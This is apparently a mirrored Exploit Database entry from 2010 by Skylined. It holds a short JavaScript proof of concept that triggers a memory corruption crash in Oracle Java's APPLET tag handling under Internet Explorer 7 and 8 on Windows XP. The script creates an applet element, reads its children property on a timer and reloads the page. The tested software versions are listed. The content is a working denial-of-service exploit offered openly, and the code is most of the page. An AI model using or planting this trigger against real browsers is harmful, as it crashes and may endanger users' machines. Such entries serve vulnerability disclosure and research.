Oracle Java – APPLET Tag Children Property Memory Corruption

Exploit Database
127 阅读

作者： Skylined

日期： 2010-10-13
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/15243/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

Source: http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/

<SCRIPT>

o=document.createElement("applet");

setTimeout(function () {

x=o.children;

location.reload();

}, 1);

</SCRIPT>

Tested with:

Windows XP sp3 (5.1.2600)

MSIE 7.0.5730.13

MSIE 8.0.6001.18702

Sun Java Version 6 Update 20 1.6.0_20-b02